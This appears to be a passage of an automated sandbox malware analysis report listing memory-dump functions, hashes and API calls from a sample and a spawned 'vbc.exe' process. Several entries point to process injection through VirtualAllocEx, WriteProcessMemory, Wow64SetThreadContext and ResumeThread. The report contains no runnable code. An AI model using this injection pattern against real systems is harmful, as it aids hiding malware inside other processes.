Instruction ID: f63cb8b75f6cb053b8b1002f4d21f29f8974f9e39f491fb2c95189902ce46c40
Opcode Fuzzy Hash: dad60e3e2985d77680d543da6fd2b4757642aac1c8c6e90ebe554119e7b00123
Instruction Fuzzy Hash: B841F2B1C00719CFDB24DFA9C844B9EBBF5BF48304F60806AD408AB295DB75A946CF90

Function 05674942 Relevance: 1.6, APIs: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,05674862,?,?,?,?,?), ref: 05674907

Memory Dump Source

Source File: 0000000A.00000002.2135338729.0000000005670000.00000040.00000800.00020000.00000000.sdmp, Offset: 05670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5670000_TZRtlifudvO.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 9b19b165700f4ecb1d8c7377abc8fe8a4107096cb8aa429523e225834e837c4f
Instruction ID: 3f9c3b1050e69827616bcbbe62b2ebd2280d3345a9c5a095fd0f52cf0e8ad847
Opcode Fuzzy Hash: 9b19b165700f4ecb1d8c7377abc8fe8a4107096cb8aa429523e225834e837c4f
Instruction Fuzzy Hash: 6031F4766002088FDB20DF59D844BEEB7F9FF84315F14812AE15997364CB75A880CB61

Function 05674848 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2135338729.0000000005670000.00000040.00000800.00020000.00000000.sdmp, Offset: 05670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5670000_TZRtlifudvO.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 05d6cb7703336915ee857ebb4711072665b47081a049f96c3476533e25906a81
Instruction ID: 66ff6931a15ec585755e0db9d9e15569297413b5822fa1a76591b00b9b0a743d
Opcode Fuzzy Hash: 05d6cb7703336915ee857ebb4711072665b47081a049f96c3476533e25906a81
Instruction Fuzzy Hash: 6A3158729043999FCB11DFA9D844AEABFF8EF09310F14805AE954A7221C335E954DFA1

Function 05689EC0 Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 05689F58

Memory Dump Source

Source File: 0000000A.00000002.2135397878.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5680000_TZRtlifudvO.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 30bb27489ea0933734d7094d2834b0fa441d118bb1865b52060a2bf8a9a71525
Instruction ID: 07a7fea550799d6e708a2f5eaa0678bae4d5224a3910a005a114f2774693bdaa
Opcode Fuzzy Hash: 30bb27489ea0933734d7094d2834b0fa441d118bb1865b52060a2bf8a9a71525
Instruction Fuzzy Hash: 5E212A759003499FCB10DFA9C985BEEBBF5FF49310F14842AE519A7340C7789954CBA0

Function 05689EC8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 05689F58

Memory Dump Source

Source File: 0000000A.00000002.2135397878.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5680000_TZRtlifudvO.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 59549ea838a9cdb041fa61230d4954503180392a90e060993529e55378074c63
Instruction ID: 904bba4d4bff8c728f89d2bdced3e780153e9a095f5bc0eca17d6da80a170634
Opcode Fuzzy Hash: 59549ea838a9cdb041fa61230d4954503180392a90e060993529e55378074c63
Instruction Fuzzy Hash: D62116B59003499FCB14DFAAC985BEEBBF5FF48310F10842AE919A7340D7789954CBA0

Function 05689D28 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05689DAE

Memory Dump Source

Source File: 0000000A.00000002.2135397878.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5680000_TZRtlifudvO.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 910b32d7cebf6a9d5cc69e0b212049cfe88505384818f83d96731fd545d9efa1
Instruction ID: b17730fb4d657ae9f7ba532586f036985ce224f6aff9ef57368ea8ca755bfd17
Opcode Fuzzy Hash: 910b32d7cebf6a9d5cc69e0b212049cfe88505384818f83d96731fd545d9efa1
Instruction Fuzzy Hash: 7D2137719002098FDB10DFAAC4857EEBBF4FF89314F14842AD519A7241CB78A985CFA4

Function 05689FB0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0568A038

Memory Dump Source

Source File: 0000000A.00000002.2135397878.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5680000_TZRtlifudvO.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 6bb2ced001e7246068621fa54201f5729d2bb7403da17bc187657c727dca4b29
Instruction ID: 8872a820775ab75f6158a964ebc0fb590fa7899aef9cb6432490a5d1ab3ed14e
Opcode Fuzzy Hash: 6bb2ced001e7246068621fa54201f5729d2bb7403da17bc187657c727dca4b29
Instruction Fuzzy Hash: 902137B1C002499FCB10DFAAC881BEEFBF5FF48314F54842AE959A7250C7799951CBA0

Function 05689D30 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05689DAE

Memory Dump Source

Source File: 0000000A.00000002.2135397878.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5680000_TZRtlifudvO.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 154eb79e31358799e69d3cfbf41a4bc0cda7b46dae64f2c14b6476fe0fe7d65b
Instruction ID: 1bc5d543df4c87c79efb1895096d65f50d4010fe02dd30ed68126fce7b06853f
Opcode Fuzzy Hash: 154eb79e31358799e69d3cfbf41a4bc0cda7b46dae64f2c14b6476fe0fe7d65b
Instruction Fuzzy Hash: B12115B19006098FDB10DFAAC4857EEBBF4FF88314F14842AD519A7341CB78A945CFA5

Function 05689FB8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0568A038

Memory Dump Source

Source File: 0000000A.00000002.2135397878.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5680000_TZRtlifudvO.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 66727a293620226ebd80242e6901bb1d77c72af9363822466291e9761ab5222a
Instruction ID: d4f48e37511642c7b44e9e88e1acc8be10fc47d9d475e4bd79103bf423ff01df
Opcode Fuzzy Hash: 66727a293620226ebd80242e6901bb1d77c72af9363822466291e9761ab5222a
Instruction Fuzzy Hash: 672128B18002499FCB10DFAAC841AEEFBF5FF48314F50842AE919A7240C7799541CBA0

Function 0228E000 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0228E087

Memory Dump Source

Source File: 0000000A.00000002.2129942537.0000000002280000.00000040.00000800.00020000.00000000.sdmp, Offset: 02280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2280000_TZRtlifudvO.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 6b52310239aaa182538f240f77d632f7c9010fd6a78d5df638efc1a11f5b3367
Instruction ID: 22ceec42098c8da977c76f614ea327a91056e5a659568c6f5acfe8e77fb7c35b
Opcode Fuzzy Hash: 6b52310239aaa182538f240f77d632f7c9010fd6a78d5df638efc1a11f5b3367
Instruction Fuzzy Hash: 4E21F5B59002489FDB10DFAAD984ADEFFF9FB48310F14841AE918A3350C378A950CFA0

Function 05672564 Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,05674862,?,?,?,?,?), ref: 05674907

Memory Dump Source

Source File: 0000000A.00000002.2135338729.0000000005670000.00000040.00000800.00020000.00000000.sdmp, Offset: 05670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5670000_TZRtlifudvO.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 48abbb031b4509843e6d75d7648bf6b9b7f17cedeedfd462755660018dd875f1
Instruction ID: 8b3d67eee43588853e7a7d80252988e25d922c456bf5ee5e7269a3517c59b7e7
Opcode Fuzzy Hash: 48abbb031b4509843e6d75d7648bf6b9b7f17cedeedfd462755660018dd875f1
Instruction Fuzzy Hash: 7E1137B580034D9FDB10DF9AC844BEEBFF8EB48310F14841AE514A7210C779A950DFA5

Function 05689E00 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05689E76

Memory Dump Source

Source File: 0000000A.00000002.2135397878.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5680000_TZRtlifudvO.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d06f44a46ff1bb62ae9160c7117453fab6dec9ad57ac939d5a5fc7134cfdfc4c
Instruction ID: 693c9421b85b788f12bbe7fed76ee037da0d1092b33fda2b805cd1320778624b
Opcode Fuzzy Hash: d06f44a46ff1bb62ae9160c7117453fab6dec9ad57ac939d5a5fc7134cfdfc4c
Instruction Fuzzy Hash: 3A1126768002499FCB10DFAAD845BEEBFF5FF89310F148419E519A7250CB79A990CFA1

Function 05689E08 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05689E76

Memory Dump Source

Source File: 0000000A.00000002.2135397878.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5680000_TZRtlifudvO.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 4adce59c538b15a8eaa17e224f42bb5b4722674027cb554d8036e3a26bda8a8e
Instruction ID: b2393174c1890b1cc8525ab3db5f47b7c7c76f6115db77d62026cb3cd183575e
Opcode Fuzzy Hash: 4adce59c538b15a8eaa17e224f42bb5b4722674027cb554d8036e3a26bda8a8e
Instruction Fuzzy Hash: 2A1126758002499FCB10DFAAC845BEEBFF5EF89310F148419E519A7250C779A550CBA1

Function 05689C78 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 05689CE2

Memory Dump Source

Source File: 0000000A.00000002.2135397878.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5680000_TZRtlifudvO.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: cf3961dabec4b7d8b257fd6b59c8eb3d4064ba0e093ff8814b10fd7c371ced08
Instruction ID: 8fc3f11e6b69a2b2df152c8e113cc27ebfa72e649bef0fccf3824bb3b1e95554
Opcode Fuzzy Hash: cf3961dabec4b7d8b257fd6b59c8eb3d4064ba0e093ff8814b10fd7c371ced08
Instruction Fuzzy Hash: 08112BB1D002498FCB10DFAAD4457EEFBF5FF49314F148419D519A7240CB79A545CBA4

Function 05689C80 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 05689CE2

Memory Dump Source

Source File: 0000000A.00000002.2135397878.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5680000_TZRtlifudvO.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: b8aaa558000826465ba6503e41dde2efe6f9d8a7fc197e7dfa13dd5f5a1b4cf0
Instruction ID: 40fefa082a6abd0bd6905bce4a0acd564bcfdde18ea9cfb3e838f2cbaeb83509
Opcode Fuzzy Hash: b8aaa558000826465ba6503e41dde2efe6f9d8a7fc197e7dfa13dd5f5a1b4cf0
Instruction Fuzzy Hash: EF113AB1D002498FCB20DFAAC4457EEFBF5FF88314F248419D519A7240CB79A544CBA0

Function 0568A1E4 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0568DDBD

Memory Dump Source

Source File: 0000000A.00000002.2135397878.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5680000_TZRtlifudvO.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 0d7caaeec3d46664a3f1b87d1c35cf50b2f84be8a54caa54661487658b62acb8
Instruction ID: 9262b41785a3c1eabbcc7d7c775e649916d2e705a78a0329dc85bb5f5e6c2cb2
Opcode Fuzzy Hash: 0d7caaeec3d46664a3f1b87d1c35cf50b2f84be8a54caa54661487658b62acb8
Instruction Fuzzy Hash: 3F11F2B58003489FDB20DF9AD445BEEBBF8EB48320F108419E518A7240C379A954CFE1

Function 0228BD20 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0228BD86

Memory Dump Source

Source File: 0000000A.00000002.2129942537.0000000002280000.00000040.00000800.00020000.00000000.sdmp, Offset: 02280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2280000_TZRtlifudvO.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: d7704f7b93a7a202edc4428a0962c5c9b2791c06881c8ce78637e7ef14c598ff
Instruction ID: ac5e39f838432fdb95168add597098ccd2389231a633e20f23bf57414810c1d1
Opcode Fuzzy Hash: d7704f7b93a7a202edc4428a0962c5c9b2791c06881c8ce78637e7ef14c598ff
Instruction Fuzzy Hash: F1110FB5C002498FCB20DF9AC444B9EFBF4AF89214F14841AD418A7255D379A545CFA1

Function 0568DD59 Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0568DDBD

Memory Dump Source

Source File: 0000000A.00000002.2135397878.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5680000_TZRtlifudvO.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 550b7f6f38dd2fa30bcca3ace4cc8215741863c098c7ad24e50531c542a26226
Instruction ID: 38c728c1c1dd752a37022292f817dd986cfc37cea8e65dd0aecd28247653cdd8
Opcode Fuzzy Hash: 550b7f6f38dd2fa30bcca3ace4cc8215741863c098c7ad24e50531c542a26226
Instruction Fuzzy Hash: F51103B68003489FDB10DF9AD885BEEBBF8FB48310F14841AE518A3350C379A544CFA1

Function 007ED3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2128870622.00000000007ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 007ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ed000_TZRtlifudvO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58689736e2a4a9f4a187baf4b1c197d1d37d5e818e7bbb009af003302137a213
Instruction ID: 66ec62c16d1382c322a42e2109726a789462e283635d7293245f319b21ca1727
Opcode Fuzzy Hash: 58689736e2a4a9f4a187baf4b1c197d1d37d5e818e7bbb009af003302137a213
Instruction Fuzzy Hash: 4E2124B1100284DFCB25DF54C9C0B16BF65FBA8314F20C169ED090B296C33AEC16C6A2

Function 007ED4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2128870622.00000000007ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 007ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ed000_TZRtlifudvO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 417c843e5a8723274ef896f36c0bedacb596dc1d1d5a90ce5c60dbcc1d676f94
Instruction ID: 2f9e0352df89d54ccddc8271259a4062131587e470848a5486892d697a2e7991
Opcode Fuzzy Hash: 417c843e5a8723274ef896f36c0bedacb596dc1d1d5a90ce5c60dbcc1d676f94
Instruction Fuzzy Hash: 262100B2500280DFCB25DF14D9C0F26BF65FB98318F20C569E9090B256C33ADC26DAA2

Function 007FD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2128938083.00000000007FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7fd000_TZRtlifudvO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f175f07453fa4aafb3f662856ac6348e80854239f408482c0b9764e6fc29c63
Instruction ID: 188f30156b256a037bf061fcf9653ab64b268837b8957dc2ab524a92f175ee49
Opcode Fuzzy Hash: 6f175f07453fa4aafb3f662856ac6348e80854239f408482c0b9764e6fc29c63
Instruction Fuzzy Hash: A221D371604208DFDB25DF24D584B26BB66EB88314F20C569DA094B356CB3EDC06CA62

Function 007FD1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2128938083.00000000007FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7fd000_TZRtlifudvO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfeb4eea5ab2fb45fafdfc31fbbe925e57d30c89731c34065635a484013988e7
Instruction ID: 3cac3928d94a762a7566a0354999eeb31bb34faadb97ed401d8207e1c20052f5
Opcode Fuzzy Hash: bfeb4eea5ab2fb45fafdfc31fbbe925e57d30c89731c34065635a484013988e7
Instruction Fuzzy Hash: 3121F571504208DFDB25DF54D5C0B26BB66FB88314F20C56DDA094B356C33EDC06DAA1

Function 007ED4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2128870622.00000000007ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 007ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ed000_TZRtlifudvO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction ID: 12e4dc45d6d9f3f14c07857c2df7dfa2882ad0fb21e40cf7b4dc5ab693daaebe
Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction Fuzzy Hash: C811E676504280CFCB16CF14D9C4B16BF72FB98314F24C6A9D9490B656C33AD86ACBA2

Function 007ED3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2128870622.00000000007ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 007ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ed000_TZRtlifudvO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction ID: 72b75b465fee1c74cd629421a6a32db3fbbdadc0399aadaf4fb7d53808f6277b
Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction Fuzzy Hash: A011E476404280CFCB12CF04D5C4B16BF71FBA9314F24C6A9DD090B256C33AD856CBA1

Function 007FD1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2128938083.00000000007FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7fd000_TZRtlifudvO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction ID: adea1d6952c3477de8361e38cf9e8d0e492e4181148ad01526bdf26cd42d0de1
Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction Fuzzy Hash: 3511BB75504284DFCB12CF10C5C4B25BBA2FB84324F24C6AAD9494B396C33AD80ACBA2

Function 007FD017 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2128938083.00000000007FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7fd000_TZRtlifudvO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction ID: 7e2d1f23e91287482196b7a255c3e83d07b0baff9634ce01b9ecfd288014445a
Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction Fuzzy Hash: 8411DD75504284CFCB26CF14D5C4B25FFA2FB88314F24C6AAD9494B756C33AD80ACBA2

Analysis Process: vbc.exePID: 7584, Parent PID: 7252COMMON

Executed Functions

Function 06422EF8 Relevance: 8.9, Strings: 6, Instructions: 1412COMMON

Download Yara Rule

Strings

Xaq, xrefs: 064241D5
Xaq, xrefs: 06422FF0
Xaq, xrefs: 0642306F
Xaq, xrefs: 064241FE
Xaq, xrefs: 06422FB6
Xaq, xrefs: 064230BC

Memory Dump Source

Source File: 00000010.00000002.4512499727.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6420000_vbc.jbxd

Similarity

API ID:
String ID: Xaq$Xaq$Xaq$Xaq$Xaq$Xaq
API String ID: 0-499371476
Opcode ID: 850865bb80335189652d403acaf8e98c8bf419b6c0023800ca26075e7ba692a8
Instruction ID: 84636f7ff8ceb5659ef9dfee402f8ebf67cdc7cd2f02d2d2e9c61730f13c052f
Opcode Fuzzy Hash: 850865bb80335189652d403acaf8e98c8bf419b6c0023800ca26075e7ba692a8
Instruction Fuzzy Hash: E082C3306021636EEB568E56EC849B7FBB9FBC53407B4D65AE4D786002C6748DC3CAE1

Function 064274E0 Relevance: 6.7, Strings: 5, Instructions: 447COMMON

Download Yara Rule

Strings

,aq, xrefs: 064277B0
(o]q, xrefs: 06427738
(o]q, xrefs: 0642772A
(o]q, xrefs: 06427A55
,aq, xrefs: 064277A2

Memory Dump Source

Source File: 00000010.00000002.4512499727.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6420000_vbc.jbxd

Similarity

API ID:
String ID: (o]q$(o]q$(o]q$,aq$,aq
API String ID: 0-615190528
Opcode ID: c4c0969757e990237fc1fdf70d11cf7cd9e4ed0d0a3dfba063e7cabd2965d0b0
Instruction ID: a502f89237445a70da30d7b49261cce8a6dd460f802beca17e47f7972860a94c
Opcode Fuzzy Hash: c4c0969757e990237fc1fdf70d11cf7cd9e4ed0d0a3dfba063e7cabd2965d0b0
Instruction Fuzzy Hash: 63026030E0022ADFDB55CF69C984AAEBBF2FF88350F64855AE415AB365D730D941CB50

Function 0642C4E0 Relevance: 6.6, Strings: 5, Instructions: 351COMMON

Download Yara Rule

Strings

PH]q, xrefs: 0642C913
Lj@p, xrefs: 0642C88A
0o@p, xrefs: 0642C71D
Lj@p, xrefs: 0642C8A0
PH]q, xrefs: 0642C902

Memory Dump Source

Source File: 00000010.00000002.4512499727.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6420000_vbc.jbxd

Similarity

API ID:
String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
API String ID: 0-1229222154
Opcode ID: b553f1dd4be8287508643d2b554e52ce02a15a7240e2b8c5137c634f22a5b32c
Instruction ID: c8364489924329ad8ab3a906af514ef26e5f3426d042a9de044c50b798f2b70f
Opcode Fuzzy Hash: b553f1dd4be8287508643d2b554e52ce02a15a7240e2b8c5137c634f22a5b32c
Instruction Fuzzy Hash: 01E11F74E00229DFDB95CF69C984A9EBBF2BF48310F65906AE819AB361D730D841CF50

Function 0642586F Relevance: 6.4, Strings: 5, Instructions: 194COMMON

Download Yara Rule

Strings

Lj@p, xrefs: 06425A63
PH]q, xrefs: 06425ADB
PH]q, xrefs: 06425AEC
0o@p, xrefs: 064258F5
Lj@p, xrefs: 06425A79

Memory Dump Source

Source File: 00000010.00000002.4512499727.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6420000_vbc.jbxd

Similarity

API ID:
String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
API String ID: 0-1229222154
Opcode ID: 1e6a5b94439dfd5aff8bd743b62c5de9ddcc8f9a299234b468eca89ef19a800e
Instruction ID: 6d99b8a22032a2a8ac5fa005a810a32dd158313697f6bf73441a6598704150f4
Opcode Fuzzy Hash: 1e6a5b94439dfd5aff8bd743b62c5de9ddcc8f9a299234b468eca89ef19a800e
Instruction Fuzzy Hash: 5391DA74E01218DFDB58DFA9D884A9DBBF2BF88310F64C06AD809AB365DB345941CF50

Function 0642CF30 Relevance: 6.4, Strings: 5, Instructions: 187COMMON

Download Yara Rule

Strings

Lj@p, xrefs: 0642D128
Lj@p, xrefs: 0642D112
0o@p, xrefs: 0642CFA5
PH]q, xrefs: 0642D18A
PH]q, xrefs: 0642D19B

Memory Dump Source

Source File: 00000010.00000002.4512499727.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6420000_vbc.jbxd

Similarity

API ID:
String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
API String ID: 0-1229222154
Opcode ID: 181cb5fdcf1b1d2f4600df5292a451493dad777f322803b7492c030af64f6d5e
Instruction ID: 8def5c4298ee079d62a72787b4c1eecb13de12a7752cc0b4394c849bb7393510
Opcode Fuzzy Hash: 181cb5fdcf1b1d2f4600df5292a451493dad777f322803b7492c030af64f6d5e
Instruction Fuzzy Hash: DE81D974E00218DFDB58DFA9D984A9DBBF2BF89300F64C06AD819AB365DB349941CF50

Function 0642D7BD Relevance: 6.4, Strings: 5, Instructions: 186COMMON

Download Yara Rule

Strings

PH]q, xrefs: 0642DA23
Lj@p, xrefs: 0642D99A
0o@p, xrefs: 0642D82D
Lj@p, xrefs: 0642D9B0
PH]q, xrefs: 0642DA12

Memory Dump Source

Source File: 00000010.00000002.4512499727.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6420000_vbc.jbxd

Similarity

API ID:
String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
API String ID: 0-1229222154
Opcode ID: 66e3e55314482c750f81702346ecc8200480ee88375caddd119b4d47f4494c38
Instruction ID: 93148d20620aa7f76a0b0177e4f0eb9c5a4617745d132ebe2503984a3ee2a6b7
Opcode Fuzzy Hash: 66e3e55314482c750f81702346ecc8200480ee88375caddd119b4d47f4494c38
Instruction Fuzzy Hash: B381A374E00219CFDB54DFAAD994A9DBBF2BF88300F64C06AE419AB365DB349941CF50

Function 0642CC58 Relevance: 6.4, Strings: 5, Instructions: 186COMMON

Download Yara Rule

Strings

Lj@p, xrefs: 0642CE3A
Lj@p, xrefs: 0642CE50
PH]q, xrefs: 0642CEB2
PH]q, xrefs: 0642CEC3
0o@p, xrefs: 0642CCCD

Memory Dump Source

Source File: 00000010.00000002.4512499727.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6420000_vbc.jbxd

Similarity

API ID:
String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
API String ID: 0-1229222154
Opcode ID: 091e5857396c22416ab6d338d692a67fa3623cbc75bdca86af1b308681e3099f
Instruction ID: 199e50018ba29ce58dd7ba44747d5b3c5498e0ae264be8861719072b5a835b97
